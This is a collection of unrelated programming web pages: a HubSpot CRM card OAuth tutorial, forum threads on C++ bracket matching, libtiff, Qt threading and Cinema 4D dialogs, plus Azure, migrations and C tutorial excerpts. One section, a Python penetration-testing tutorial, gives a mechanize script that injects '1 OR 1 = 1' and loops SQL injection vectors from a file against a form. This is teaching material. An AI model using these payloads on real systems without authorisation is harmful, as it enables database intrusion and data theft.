and "Client Secret." Those three values should all be filled in. 
You'll want to keep track of the "Client ID" and "Client Secret" values, because we're going to use them in just a little bit. Below those are fields labeled "Install URL - OAuth" (sometimes also referred to as the "Authorization URL") and "Redirect URL," which will be blank. We must now go through the OAuth process as described. That page breaks the OAuth process down into five steps, and ends with the note "Your app will not appear as a Connected App in a user's Integration Settings unless you complete the first two of these steps. You must generate the refresh token and initial access token to have the app appear as 'connected.'" In fact, we're going to complete the first three steps, but then we will stop.

Now let's deal with the "Install URL" and "Redirect URL" fields. It looks like you should be able to type directly into the "Install URL" field, but you can't. You populate this field by typing something into the "Redirect URL" and then saving the form. And what should you type in there? This should be a URL to a destination on your server - probably the same server that you will use to serve the API that will populate the CRM cards. All the code at that URL needs to do is make a POST request. For example, the one I made in Django looks like this:

import requests
from django.http import HttpResponse

def hubspot_oauth(request):
    requests.post("", data = {
        "grant_type": "authorization_code",
        "client_id": "<client id from Hubspot dashboard>",
        "client_secret": "<client secret from Hubspot dashboard>",
        "redirect_uri": request.build_absolute_uri(),
        "code": request.GET.get("code")
    })
    return HttpResponse()

HubSpot provides an example as well. Regarding these values: the "grant_type" needs to be the literal string "authorization_code." The values for "client_id" and "client_secret" come from the "Client ID" and "Client secret" values we noted above.
The value for "redirect_uri" is simply the redirect URL you just created, and should also match what is in your HubSpot app console. I don't know why the request needs to send back its own URL, but it needs to be there. Finally, the "code" is a value sent in the querystring of the incoming request, which will come from HubSpot, as we will see... So code up something that will make a POST request like the one above, and paste the URL where that code is located into the "Redirect URL" field. Now save the form. After the save, the "Install URL" field will be populated. There should be a button next to the "Install URL" field labeled "Copy full URL." Click it. Now paste the URL you just copied into your browser. You should be presented with a list of accounts to connect the app to. At a minimum this list will contain your developer account and your test account. Select the test account by clicking on its name. You may have to confirm that you want to connect your account to this "unverified" app. When you click "confirm," a request will be sent from HubSpot to your redirect URL. The request's querystring will contain the "code" parameter that is incorporated into the POST request sent back to HubSpot, and with that, the installation is complete. If, as in the example above, your redirect URL returns nothing but an empty http response, you will find yourself looking at a blank page. But now go to the test account dashboard, navigate to the "Contacts" section, and select a contact. You should see your custom card in the lower-right corner. You should also see a data fetch request coming into your API endpoint every time the page is loaded. The request should include a querystring that contains a parameter "hs_object_id" and the HubSpot id of the contact in the page where the card was rendered. CONCLUSION HubSpot's custom CRM cards offer a really cool piece of functionality. 
Unfortunately, HubSpot's documentation only seems to regard them as a small part of a larger integration running in some external code. This can be confusing to developers unfamiliar with HubSpot, especially if their goal is only to make use of the cards without an integration.

- More information on CRM card properties (under "Webhooks" tab)
- More information on OAuth and HubSpot

NOTE: The author wishes to thank Lance Erickson for his insights into the CRM cards and the HubSpot universe in general. He works on the data team at "When I Work."
https://imagescape.com/blog/using-hubspots-custom-crm-cards-without-an-integration/
Hello, and thank you for taking the time to help me! I am working on a program that reads a string after the option "E" (enter a string) is chosen, and checks if parentheses (), brackets [], and braces {} are matched in it. There are two files, the main driver file, called Assignment8.cpp, and the utility file, MatchChecker.h. The header file has one class, the MatchChecker class, described below.

The MatchChecker class is a utility class that will be used to check if parentheses (), brackets [], and braces {} are matched in a given string. The MatchChecker class object will never be instantiated. It must have the following public function:

static string matchChecker(string lineToCheck)

The matchChecker function's argument will be a string that can contain parentheses, brackets, and braces. Other characters or numbers can appear before/after/between them. If all of them are matched, then the function should return the string: "Everything is matched!"

If there is a closing parenthesis, bracket, or brace that does not have its corresponding opening parenthesis, bracket, or brace, then for the first such character, return a string with its position such as: ") at the position 15 does not match." / "] at the position 12 does not match." / "} at the position 28 does not match." The first character of the string is seen as the position 0.

If there is no matching closing parenthesis, bracket, or brace when you reach the end of the string after checking each character, return a string naming the last opening parenthesis, bracket, or brace that did not have its matching closing one, as: ") is missing." / "] is missing." / "} is missing."

Requirements: You need to implement this function using a stack, via <stack> in the C++ STL (Standard Template Library). You can use the string "A" as a token for parentheses, "B" as a token for brackets, "C" as a token for braces.

So, as you can see, it's not a very complex program, but I have never worked with stacks before, so it's rough for me.
I have a good amount of the code written, and everything is compiling fine, but when I enter a string and then press the Enter key, the program has an error and Windows forces me to terminate the program. Here are my files, and they are also attached so that you can run them if you want.

Code:
// Assignment #: 8
// Name: Your name
// EmailAddress:
// Description: It displays a menu of choices to a user
// and performs the chosen task. It will keep asking a user to
// enter the next choice until the choice of 'Q' (Quit) is entered.
#include <iostream>
#include <string>
#include "MatchChecker.h"
using namespace std;

void printMenu();

int main()
{
    char input1;
    string inputInfo;

    printMenu();
    do // will ask for user input
    {
        cout << "What action would you like to perform?" << endl;
        cin >> input1;
        cin.ignore(30, '\n');
        // matches one of the case statements
        switch (input1)
        {
            case 'E': // Enter String
                cout << "Please enter a string.\n";
                getline(cin, inputInfo, '\n');
                // matchChecker is static, so call it on the class
                // (the class is never instantiated) and print the
                // string it returns:
                cout << MatchChecker::matchChecker(inputInfo) << endl;
                break;
            case 'Q': // Quit
                break;
            case '?': // Display Menu
                printMenu();
                break;
            default:
                cout << "Unknown action\n";
                break;
        }
    } while (input1 != 'Q' && input1 != 'q');
    return 0;
}

/** The method printMenu displays the menu to a user **/
void printMenu()
{
    cout << "Choice\t\tAction\n";
    cout << "------\t\t------\n";
    cout << "E\t\tEnter String\n";
    cout << "Q\t\tQuit\n";
    cout << "?\t\tDisplay Help\n\n";
}

Code:
// protections
#ifndef MATCHCHECKER_H
#define MATCHCHECKER_H

#include <sstream>
#include <string>
#include <stack> // std::stack from the C++ STL

using namespace std;

class MatchChecker
{
public:
    static string matchChecker(string lineToCheck)
    {
        stack<char> theStack;
        for (int j = 0; j < (int) lineToCheck.length(); j++)
        {
            char ch = lineToCheck[j];
            switch (ch)
            {
                case '{':
                case '[':
                case '(':
                    theStack.push(ch);
                    break;
                case '}':
                case ']':
                case ')':
                {
                    bool matched = false;
                    if (!theStack.empty())
                    {
                        char chx = theStack.top();
                        theStack.pop();
                        matched = (ch == '}' && chx == '{') ||
                                  (ch == ']' && chx == '[') ||
                                  (ch == ')' && chx == '(');
                    }
                    if (!matched)
                    {
                        ostringstream msg;
                        msg << ch << " at the position " << j << " does not match.";
                        return msg.str();
                    }
                    break;
                }
                default: // other characters are ignored
                    break;
            }
        }
        if (!theStack.empty())
        {
            // report the closing character that is missing for the
            // last unmatched opening one
            char closing = (theStack.top() == '{') ? '}'
                         : (theStack.top() == '[') ? ']' : ')';
            ostringstream msg;
            msg << closing << " is missing.";
            return msg.str();
        }
        return "Everything is matched!";
    }
};

#endif
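For what it's worth, the stack algorithm the assignment describes is easy to sanity-check outside C++. A Python sketch of the same logic (not the required C++ solution, just a reference for the expected return strings):

```python
def match_checker(line_to_check):
    # Push openers; on a closer, the top of the stack must be its partner.
    pairs = {')': '(', ']': '[', '}': '{'}
    closers = {'(': ')', '[': ']', '{': '}'}
    stack = []
    for j, ch in enumerate(line_to_check):
        if ch in "([{":
            stack.append(ch)
        elif ch in ")]}":
            if not stack or stack.pop() != pairs[ch]:
                return "%s at the position %d does not match." % (ch, j)
    if stack:
        # report the closer that was never seen for the last open delimiter
        return "%s is missing." % closers[stack[-1]]
    return "Everything is matched!"

print(match_checker("a(b[c]{d})"))
print(match_checker("(]"))
print(match_checker("(()"))
```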
https://cboard.cprogramming.com/cplusplus-programming/120524-problem-program-check-if-separators-match.html
An SQL injection is a set of SQL commands placed in a URL string or in data structures in order to retrieve a desired response from the databases connected to the web application. This type of attack generally takes place on webpages developed using PHP or ASP.NET.

An SQL injection attack can be done with the following intentions −

To modify the content of the databases

To perform different queries that are not allowed by the application

This type of attack works when the application does not validate the inputs properly before passing them to an SQL statement. Injections are normally placed in address bars, search fields, or data fields. The easiest way to detect whether a web application is vulnerable to an SQL injection attack is to use the " ' " character in a string and see if you get any error.

In this section, we will learn about the different types of SQLi attacks. The attacks can be categorized into the following two types −

In-band SQL injection (Simple SQLi)

Inferential SQL injection (Blind SQLi)

In-band SQL injection is the most common. This kind of SQL injection mainly occurs when an attacker is able to use the same communication channel both to launch the attack and to gather results. In-band SQL injections are further divided into two types −

Error-based SQL injection − An error-based SQL injection technique relies on error messages thrown by the database server to obtain information about the structure of the database.

Union-based SQL injection − It is another in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response.

In an inferential SQL injection attack, the attacker is not able to see the result of the attack in-band because no data is transferred via the web application. This is the reason it is also called Blind SQLi.
Inferential SQL injections are further divided into two types −

Boolean-based blind SQLi − This technique relies on sending an SQL query to the database, which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

Time-based blind SQLi − This technique relies on sending an SQL query to the database, which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

All types of SQLi can be implemented by manipulating input data to the application. In the following examples, we are writing a Python script to inject attack vectors into the application and analyze the output to verify the possibility of the attack. Here, we are going to use a Python module named mechanize, which provides the facility of obtaining web forms in a web page and facilitates the submission of input values too. We have also used this module for client-side validation.

The following Python script helps submit forms and analyze the response using mechanize −

First of all we need to import the mechanize module.

import mechanize

Now, provide the URL for obtaining the response after submitting the form.

url = input("Enter the full url")

The following lines of code will open the url.

request = mechanize.Browser()
request.open(url)

Now, we need to select the form.

request.select_form(nr = 0)

Here, we will set the column name 'id'.

request["id"] = "1 OR 1 = 1"

Now, we need to submit the form.

response = request.submit()
content = response.read()
print(content)

The above script will print the response for the POST request. We have submitted an attack vector to break the SQL query and print all the data in the table instead of one row. All the attack vectors will be saved in a text file, say vectors.txt.
Now, the Python script given below will get those attack vectors from the file and send them to the server one by one. It will also save the output to a file.

To begin with, let us import the mechanize module and create a browser object (the original listing used a browser object without creating one first).

import mechanize
browser = mechanize.Browser()

Now, provide the URL for obtaining the response after submitting the form.

url = input("Enter the full url")
attack_no = 1

We need to read the attack vectors from the file.

with open('vectors.txt') as v:

Now we will send a request with each attack vector −

    for line in v:
        browser.open(url)
        browser.select_form(nr = 0)
        browser["id"] = line.strip()
        res = browser.submit()
        content = res.read()

Now, the following lines of code will write the response to an output file (the response body is bytes, hence the 'wb' mode).

        output = open('response/' + str(attack_no) + '.txt', 'wb')
        output.write(content)
        output.close()
        print(attack_no)
        attack_no += 1

By checking and analyzing the responses, we can identify the possible attacks. For example, if a response includes the sentence You have an error in your SQL syntax, it means the form may be affected by SQL injection.
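That last step can be automated as well. A rough sketch — the signature strings below are examples only, and the real error text varies by database engine and configuration:

```python
import glob

# Tell-tale fragments of leaked database errors (illustrative, not exhaustive).
SIGNATURES = [
    "You have an error in your SQL syntax",  # MySQL
    "unterminated quoted string",            # PostgreSQL
    "Unclosed quotation mark",               # SQL Server
]

def is_suspicious(response_body):
    """Return True if the response looks like it leaked a SQL error."""
    return any(sig in response_body for sig in SIGNATURES)

# Scan the response files written by the script above, if any exist:
for path in sorted(glob.glob("response/*.txt")):
    with open(path, errors="ignore") as f:
        if is_suspicious(f.read()):
            print(path, "may be injectable")
```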
https://www.tutorialspoint.com/python_penetration_testing/python_penetration_testing_sqli_web_attack.htm
Thread 1998.06.10 15:00 "TIFFGetField syntax and use", by Steve Garcia

I want to retrieve the value of the tag's PHOTOMETRIC and BITSPERSAMPLE. I'm presuming that it is easiest to use the TIFFGetField function to do this, but I'm not having any real success. I'm using tiff-v3.4. I'm not sure I understand the syntax of the function properly. My code (truncated for e-mail purposes) is as follows:

#include <tiffio.h>

int photo, bitspersample;

main ()
{
    TIFF *tif = TIFFOpen("myfile.tif", "r");
    TIFFGetField(tif, TIFFTAG_PHOTOMETRIC, photo);
    TIFFGetField(tif, TIFFTAG_BITSPERSAMPLE, bitspersample);
    printf("Photo = %d, Bits/Sample = %d", photo, bitspersample);
    TIFFClose(tif);
}

Now I know I'm getting the memory address when I print out the "photo" and "bitspersample", yet I can't seem to retrieve the actual value that the Tags contain. Any suggestions? First major C program I'm trying to write (still a novice at this) but I really like this programming stuff. Thanks for any suggestions!

Steve

/\ /^\ Steven Garcia Graduate School, Bioengineering /^^\ /^^^\ steveg@engin.umich.edu Univ. of Michigan / \/^\ / \ / \ \/ \ / \ \ \ "I AM the last one!" - Dragonheart
https://www.asmail.be/msg0054715595.html
Daniel Kulp commented on CXF-7458:
----------------------------------

You are going to need to create a test case for this. We have a test in the code already: and if I change from threshold=1 to 1000000 then the parts are all inlined. I also tried moving the @MTOM annotation onto the impl instead of the interface, but that didn't change anything, it still behaved properly. In any case, this is not something I can reproduce.

> JAXWS : MTOM threshold value is ignored
> ---------------------------------------
>
> Key: CXF-7458
> URL:
> Project: CXF
> Issue Type: Bug
> Components: JAX-WS Runtime
> Affects Versions: 3.1.6
> Environment: Wildfly 10.1
> Reporter: Balu S
>
> The webservice is defined as MTOM enabled with threshold value as 5MB, but still the attachments (in responses) that are less than 5MB are not inlined. It looks like if `@MTOM` is enabled, the response is always returned as XOP (multipart) and ignores the threshold value.
> {quote}
> @HandlerChain(file="/handler-chain.xml")
> @MTOM(threshold=5242880) // 5MB limit for inline soap attachements else MTOM
> public class WSImpl {. }
> {quote}

-- This message was sent by Atlassian JIRA (v6.4.14#64029)
http://mail-archives.apache.org/mod_mbox/cxf-issues/201707.mbox/%3CJIRA.13090745.1501238540000.37585.1501253400239@Atlassian.JIRA%3E
Jacob first introduced Machine.Migrations over a year ago. Since then, it's been a solid part of our process and we're up to nearly 500 migrations with it on one project. Recently, I finally got around to making some changes I've been wanting to make and I wanted to call'em out:

- We split the repository out to its own on github. I did this similar to the way I did it for MSpec some time ago. Again, the advantage here is that change logs are localized to the project rather than the entire overarching Machine project.
- I added complaints if you have multiple migrations with the same number. This silently caused problems before as one of the migrations would not get applied. Now it just yells and dies like a good app. Of course, this is not as important because of the next change.

Next I added support for timestamped migrations. This helps immensely on active projects with multiple developers. You don't have to deal with communicating migration numbers to the team when you add them, you just generate a new one and merge it when you feel like it. We actually had half of our topic on Campfire dedicated to our current migration number. The other half was who owed how many pushups for breaking the build.
Here's the rake task we use to generate a new migration:

namespace :new do
  task :migration do
    raise "usage: rake new:migration name=\"Your migration name\"" unless ENV.include?('name')
    name = ENV['name']
    filepath = "db/migrate/#{Time.now.strftime('%Y%m%d%H%M%S')}_#{name.gsub(/ /,'_')}.cs"
    text = File.read("db/migrate/template.cs")
    File.open(filepath, 'w') { |file| file.puts text.gsub(/\$MigrationName\$/,"#{name.gsub(/ /,'_')}") }
  end
end

Usage is simple, just create a template.cs in the directory (we use db/migrate) and then type

rake new:migration name="this is my migration name"

Example template:

using System;
using System.Collections.Generic;
using System.Text;
using Machine.Migrations;

public class $MigrationName$ : SimpleMigration
{
  public override void Up()
  {
    throw new System.NotImplementedException();
  }

  public override void Down()
  {
    throw new System.NotImplementedException();
  }
}

Finally, I added a command line runner. As we've grown more and more sick of msbuild and more and more fond of rake, we've wanted to slowly all but eliminate our dependency on MSBuild. The command line tool is quite simple:

Machine.Migrations
Copyright (C) 2007, 2008, 2009 Machine Project

  c, connection-string   Required. The connection string to the database to migrate
  t, to                  Applies or unapplies migrations to get to the specified migration
  u, up                  Applies migrations to the latest
  s, scope               The scope?
  d, directory           Required. Directory containing the migrations
  v, compiler-version    Version of the compiler to use
  debug                  Show Diagnostics
  r, references          Assemblies to reference while building migrations separated by commas
  t, timeout             Default command timeout for migrations
  ?, help                Display this help screen

The only two flags you usually need are -c and -d. Just pass in the connection string and the location of your migrations. Be sure to quote them: migrate.exe -c "my connection string" -d "my migration directory". Hopefully these changes help others.
Grab the latest here and just msbuild the sln to build it. I do wonder though, what other active .NET migration projects are people using and how do you like them?
http://codebetter.com/aaronjensen/2009/10/24/machine-migrations-changes/
We are excited to announce that the Windows Azure Service Bus is now part of the new Windows Azure portal. In addition to existing features that enable you to manage Service Bus entities, we are introducing new portal features with the October 2012 release of the Service Bus. The new features are described below.

We revisited the overall portal experience and optimized it around the most common scenarios, enabling faster access to entity data and management operations. Let's start with the most common scenarios. We optimized the portal's experience around scenarios that any new Service Bus user would go through; and creating new namespaces and entities is one of them.

The Quick Create experience is designed to help you create a new entity (queue, topic, or relay) in one easy step, even if you don't have a pre-created service namespace. You provide a name for the entity (e.g. name of the queue), select the region and the Windows Azure subscription (in the case of multiple subscriptions) to be used, and the namespace under which this entity is created. If you don't have an existing namespace, you are asked to provide a name for one. If you have a single pre-existing namespace, the entity is created under it. In the case of multiple namespaces, you can select one of them. Your entity is ready to use once you get the "success" message at the bottom of the page. Your entity is created with the default parameters, such as the message's time-to-live (TTL) value, as specified in the Service Bus official documentation.

Generally, Quick Create allows you to create top level entities: queues, topics, and relays. An important point to note: the relays Quick Create does not create an actual relay endpoint. It creates a service namespace for you as a container of this relay endpoint. You must still create relays programmatically using our APIs. You can read more about that here.
Custom Create is the more detailed version that gives you knobs to change the default values of the properties of the entity (queue or topic) being created. You can still select a pre-created namespace or create a new one using the custom create scenario. We don't yet support updating the properties of messaging entities. So, once you create a queue or topic, you cannot change any of its properties. You can still change its status, which will be explained below.

A new feature being introduced in the Windows Azure Service Bus is the ability to change the status of a messaging entity (queue, topic, or subscription) that enables the entity to send or receive messages. Now you can suspend a queue, topic, or a subscription. A sender cannot send messages to a suspended entity. Also, other applications and devices cannot receive messages from this entity. The new Windows Azure portal allows you to change the state of an entity to either Resume or Suspended.

With the new portal, you get a comprehensive and timely view of the status of your queues and topics. You can also monitor their usage. This is a major new feature we have introduced in the new Windows Azure portal. You can now see activities on queues, topics, subscriptions, or relays that you've created. You can view this information over multiple time windows: the last hour, the last 24 hours, 7 days, or the last 30 days. You can see data with a precision as low as 5-minute measurement points for the one hour window, 1 hour for the 24-hour window, and 1 day for the 7 and 30-day windows. For any queue, you can see charts of:

- Incoming Messages: number of messages queued during this time interval.
- Outgoing Messages: number of messages de-queued during this time interval.
- Length: number of messages in the entity at the end of this time interval.
- Size: storage space (in MB) being used by this entity at the end of this time interval.
Under “quick glance” on the dashboard, we reflect the current size of the queue as Queue Length amongst other pieces of information. This information is refreshed every 10 seconds. Another very useful piece of information is the View Connection String link. It provides the connection string to that entity’s namespace, which you can then use in your code to create a queue or topic client. A topic dashboard is fairly identical, except for the usage metrics. Outgoing messages and length are not present in the topic dashboard, as that information would be different for each of the subscriptions for a topic. The Monitor tab enables you to add usage metrics (number of outgoing messages and length), per topic subscription. To add these metrics, click on add metrics at the bottom of the page, and then choose from the subscriptions under the topic. Going forward, we will be enriching our story for better management, monitoring and diagnostics of Service Bus entities by adding more features. New features will include a namespace dashboard for aggregated views, a dashboard for subscriptions on every topic, additional metrics, the ability to update entity properties, and more. We are definitely interested in hearing from you what more should be done -- so please leave comments with suggestions! The current portal will continue to work side-by-side with the new portal. It is now in maintenance mode, so we won’t be adding any new features. However, any changes you make to your Service Bus entities will be reflected in both places. Let us know what you think of our new portal. We will be more than glad to get your feedback for missing features and/or possible improvements.
http://blogs.msdn.com/b/windowsazure/archive/2012/10/08/introducing-a-new-user-experience-for-windows-azure-service-bus.aspx
Caleb Kleveter (Treehouse Moderator, 37,862 Points)

Method returns with hashes and arrays

I feel like I should be writing more code, but I'm not sure. Here are the instructions (I'm on step 1):

"Modify the create_shopping_list method to return a hash with the following keys and values:
'title': A string with the value "Grocery List"
'items': An empty array"

shopping_list.rb

def create_shopping_list
  puts "Title: " + "Grocery List"
  puts "Items: " + [].to_s
end

2 Answers

Jose Rosado (3,090 Points)

Caleb,

Remember that the create_shopping_list method should return a Hash.

def create_shopping_list
  # hashes are created with curly braces {}, e.g.: new_hash = {}
  hash = {
    "title" => "Grocery List", # this is a key/value pair: "title" is the key and "Grocery List" is the value
    "items" => [] # the key "items" maps to an empty array
  }
end

Jose Rosado (3,090 Points)

Also, you can use numbers and symbols as keys. Read this to understand Hashes better.
https://teamtreehouse.com/community/method-returns-with-hashes-and-arrays
Parallel Programming - Exotic_Devel

Parallel programming is an ancient subject, but it is still not very widely used (in my opinion). For a simple desktop application (database connection, sales and purchases), what benefits can parallel programming provide?

- SGaist Lifetime Qt Champion

Hi,
When you say parallel programming, do you mean multithreading?

- Exotic_Devel

Yes. I know that parallel programming provides benefits related to performance. But for a simple desktop app (sales, ...), is there a benefit?

- SGaist Lifetime Qt Champion

The only answer is: it depends. It's really use-case based. Threads are not the answer to everything; e.g. you can do many things asynchronously with Qt.

- JKSH Moderators

Parallel processing helps if you have functions that take a long time to return (for example, if your database queries take 5 seconds). In this example, your GUI will freeze if you use 1 thread only. Having said that, you might be able to optimize your program in other ways (for example, you could rewrite your SQL query to be more efficient). If you can make your functions return faster, then you don't need parallel programming.

@Exotic_Devel said:
Yes, I know that parallel programming provides benefits related to performance.

Not always. If you use it wrongly, you can get worse performance.

Hi, as @JKSH said, multi-threaded programming helps only if your algorithm can be parallelized. Keep in mind that if you use multiple threads you MUST synchronize the access to shared data, so sometimes it makes no sense to use threads instead of working with a single thread in asynchronous mode.

- Meyer Sound

@mcosta, in response to "MUST synchronize the access to shared data": this is not the only method. There is the "lock-free queue" concept, but as this can be troublesome, it is usually only considered as an optimization. I see it coming up in the world of audio plugin development, but I'm sure there are other performance-bound contexts.

@Meyer-Sound You're right. Sometimes synchronization is not the only way. BTW, my point was that multi-threaded programming is NOT the best solution for every problem. Keep in mind that creating sub-processes or threads consumes resources, and sometimes this is a problem. In the original example from @Exotic_Devel (DB connections for simple sales and purchases) you can easily manage all the work with the standard Qt asynchronous mode.

- stereomatchingkiss

Another example is when you are trying to rename a lot of files. Since I/O is very, very slow, you would not like this kind of operation to "freeze" your UI. To give the users a feeling that your UI is still "alive", you can create a thread to rename the files and update a QProgressBar. Chapter 8 of the book "Advanced Qt Programming" shows how to do it.
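A language-neutral sketch of that last pattern (plain Python rather than Qt — in a real Qt app you would use QThread or QtConcurrent and signal/slot progress updates): the slow "renames" run on a worker thread while the caller stays free and receives progress callbacks. The file names and delay below are made up.

```python
import concurrent.futures
import time

def rename_many(names, on_progress):
    """Simulate slow I/O-bound renames; report progress after each one."""
    done = []
    for i, name in enumerate(names, start=1):
        time.sleep(0.01)            # stands in for a slow filesystem call
        done.append(name + ".bak")
        on_progress(i, len(names))  # in Qt this would be a signal emission
    return done

progress = []
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
    # The "UI" thread stays free while the worker runs.
    future = pool.submit(rename_many, ["a", "b", "c"],
                         lambda i, n: progress.append((i, n)))
    result = future.result()  # a GUI would poll or use a done-callback instead

print(result)    # ['a.bak', 'b.bak', 'c.bak']
print(progress)  # [(1, 3), (2, 3), (3, 3)]
```

In a GUI you would not block on `future.result()`; the point is only that the blocking I/O never runs on the event-loop thread.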
https://forum.qt.io/topic/53259/parallel-programing/6
Dialogs attached to ToolData plugins never freed?

On 26/05/2013 at 14:54, xxxxxxxx wrote:

Hi,

Is it true that a GeDialog attached to a ToolData instance is never freed? While AllocSubDialog() is called each time the tool is raised, I could not manage to get __del__ called for my GeDialog instance. I of course made sure that I do not store a reference to the dialog in my tool instance, like you normally do.

def AllocSubDialog(self, startbc):
    # might look funny but is the same as - return someclass.__init__()
    return self.DialogType(host=self)

Also, AskClose() and DestroyWindow() are never called; it seems that the dialog continues to exist internally. Normally you might prefer this behaviour or not care about it, but for me it is currently a bit annoying. I just need to catch the moment when the dialog is closing.

On 26/05/2013 at 15:53, xxxxxxxx wrote:

I don't know why it is not called (I also didn't test it), but you can override ToolData.FreeTool().

-Nik

On 26/05/2013 at 17:21, xxxxxxxx wrote:

This is the second time you've said that "ToolData plugins have a GeDialog attached to them". But what I see in the docs is that ToolData plugins have a sub dialog you can use with them: AllocSubDialog(self, bc). Not a GeDialog. Where did you get the idea that a ToolData plugin has a GeDialog attached to it? I'm not seeing that in the docs.

-ScottA

On 27/05/2013 at 01:02, xxxxxxxx wrote:

SubDialog is a subclass of GeDialog. And it doesn't implement anything new.

On 27/05/2013 at 03:06, xxxxxxxx wrote:

Originally posted by xxxxxxxx

I don't know why it is not called (I also didn't test it), but you can override ToolData.FreeTool().

-Nik

The problem is, you can close a tool's dialog without closing (freeing) the tool. If you then try to invoke methods on the tool's dialog, C4D crashes (even if you make the dialog a member of the tool class to keep it alive). Not sure about the internal reasons for that, but at least GeDialog.DestroyWindow() should be called on closing tool dialogs (as the C++ docs imply).

On 27/05/2013 at 03:27, xxxxxxxx wrote:

Ah yes, I remember this from when I implemented a Python tool! I'm not sure how I got to know when the dialog was not visible anymore back then, but what I do know is that the reference to the dialog was not valid anymore, and therefore Cinema crashed or you got invalid data.

I cached the parameters using a small tool I wrote, and now I have it implemented in c4dtools.misc.dialog. Maybe you want to check it out; it is very useful. It enables you to retrieve all values of a dialog in a BaseContainer or a dictionary, and also allows you to set the values back via a BaseContainer or dictionary.

Here's an excerpt from a plugin where I used it. In this code, I used it to save and load the parameters of the dialog to keep the configuration even when you restarted Cinema. You can use this to cache your symbols, of course.

import c4d
import c4dtools
from c4dtools.misc.dialog import DefaultParameterManager

res, _ = c4dtools.prepare()

class MainDialog(c4d.gui.GeDialog):

    def __init__(self):
        super(MainDialog, self).__init__()
        self.params = p = DefaultParameterManager()
        p.add('remove_empty', res.CHK_REMOVEEMPTYNULLS, 'b', True)
        p.add('preserve_names', res.CHK_PRESERVENAMES, 'b', True)
        p.add('remove_normaltags', res.CHK_REMOVENORMALTAGS, 'b', True)
        p.add('remove_uvwtags', res.CHK_REMOVEUVWTAGS, 'b', True)
        p.add('align_normals', res.CHK_ALIGNNORMALS, 'b', True)
        p.add('norm_projection', res.CHK_NORMALIZEPROJECTION, 'b', True)

    # Just a helper I used. I can now access parameters using
    # self.v_optimize to get the value associated with the name "optimize"
    # in the DefaultParameterManager.
    def __getattr__(self, name):
        if name.startswith('v_'):
            name = name[2:]
            return self.params.get(self, name)
        else:
            return getattr(super(MainDialog, self), name)

    def CreateLayout(self):
        return self.LoadDialogResource(res.DLG_MAIN)

    def InitValues(self):
        self.params.set_defaults(self)
        # Load a BaseContainer with all the parameters of the dialog.
        config = load_dialog_config()
        self.params.load_container(self, config)
        return True

    def DestroyWindow(self):
        config = self.params.to_container(self)
        save_dialog_config(config)

-Nik

On 27/05/2013 at 03:44, xxxxxxxx wrote:

The problem is not accessing dialog parameters; my dialog base class already has a BaseContainer-based parameter solution that it passes on each update to its host, the ToolData instance. The problem was invoking methods on the dialog from outside of the dialog, but I have solved it now using core messages and keeping all calls on the dialog inside the dialog. But I think the crashing and the DestroyWindow() problem should be fixed in Python.

edit: thanks for your help :) I tend to be a bit grumpy on Mondays, so please excuse my grumpy tone :)

On 27/05/2013 at 08:51, xxxxxxxx wrote:

Originally posted by xxxxxxxx

SubDialog is a subclass of GeDialog. And it doesn't implement anything new.

Yes. But that does not mean that a GeDialog is "attached" to a ToolData plugin. A SubDialog is available in a ToolData plugin because it was specifically added to it in the SDK by the developers, and was tested by them. The GeDialog was not. Sure, we can spawn a GeDialog and force it to work using special messages. We can do that in other types of plugins too. But that's not the way the developers intended us to use the ToolData class. And while it's fun to create our own custom hacks and workarounds for things not in the SDK, I just think it's wrong (and dangerous) to say that a GeDialog is attached to a ToolData plugin.

-ScottA
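For readers without Cinema 4D at hand, the caching idea in the excerpt above can be reduced to a framework-free sketch (ParameterCache and all its names are mine, standing in for c4dtools' DefaultParameterManager): keep the dialog's values in a plain dict keyed by parameter name, snapshot them when the dialog is destroyed, and the snapshot survives after the dialog object itself is gone.

```python
# Minimal stand-in for the parameter-caching pattern: no c4d required.
class ParameterCache:
    def __init__(self):
        self._defaults = {}
        self._values = {}

    def add(self, name, default):
        # register a parameter with its default value
        self._defaults[name] = default

    def set_defaults(self):
        # what InitValues() would do on first open
        self._values = dict(self._defaults)

    def get(self, name):
        return self._values[name]

    def to_dict(self):
        # what DestroyWindow() would call: snapshot everything
        # before the dialog is torn down
        return dict(self._values)

cache = ParameterCache()
cache.add('optimize', True)
cache.add('tolerance', 0.01)
cache.set_defaults()
snapshot = cache.to_dict()  # usable even after the dialog is freed
print(snapshot['optimize'], snapshot['tolerance'])  # True 0.01
```

The real manager additionally maps names to dialog widget IDs and serializes to a BaseContainer, but the ownership idea — values live outside the dialog object — is the same.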
https://plugincafe.maxon.net/topic/7210/8252_dialogs-attached-to-tooldata-plugins-never-freed-
Welcome guys, in this module we are going to talk about decision-making statements in C, one of the most interesting and important topics of this particular series. Till now we were limited to simple linear statements, i.e., printing something to the console or taking input and printing the same. But programming is not limited to this only; we can do various interesting things and also build amazing programs. So, let's dive into the journey of this amazing module.

What are Decision Making Statements in C?

Each individual instruction of a program is called a C statement, like a variable declaration, an expression, and so on. They all terminate with a semicolon and execute in the same order as they appear in the program. But programs are not limited to this linear sequence; during execution a program may repeat segments of code or take decisions. For this purpose C provides conditional statements, or decision-making statements, that specify what has to be done, when, and under which circumstances.

We all encounter situations in real life when we need to make a decision to arrive at a particular result, so that we can proceed with what to do next. The same situation sometimes arises in programming, where we have to make some decision in order to achieve the desired result.

The decision-making statements are:
- if
- if-else
- else-if ladder
- nested if-else
- switch-case

What is an if statement in C?

It is the simplest of all the decision-making statements in C: if the mentioned condition turns out to be true, then the particular block is executed; otherwise, that block is skipped.

The syntax for declaring the same is:

if (condition)
{
    // executes if the condition is true
}

Let's see one example to make it clearer:

#include <stdio.h>
int main( )
{
    int n;
    scanf("%d", &n);
    if (n > 5)
    {
        printf("Yes");
    }
    return 0;
}

The output of the above program: if the user enters a number greater than 5, then the if block gets executed and gives the desired result; otherwise it does nothing.

What is the if-else Statement in C?

It evaluates a single or multiple test expression that results in "TRUE" or "FALSE", and the outcome decides which block of code is going to be executed. We use it when we want to execute a particular block of code if the condition is true and another block of code if the condition is false.

The syntax for declaring an if-else statement is:

if (condition)
{
    // statement
}
else
{
    // statement
}

If the condition turns out to be true, then the statements inside the if block are executed, and if the condition turns out to be false, then the statements inside the else block are executed.

Let's take one simple example to make it clearer: a program to find whether the entered number is greater than 10 or not.

#include <stdio.h>
int main( )
{
    int num;
    scanf("%d", &num);
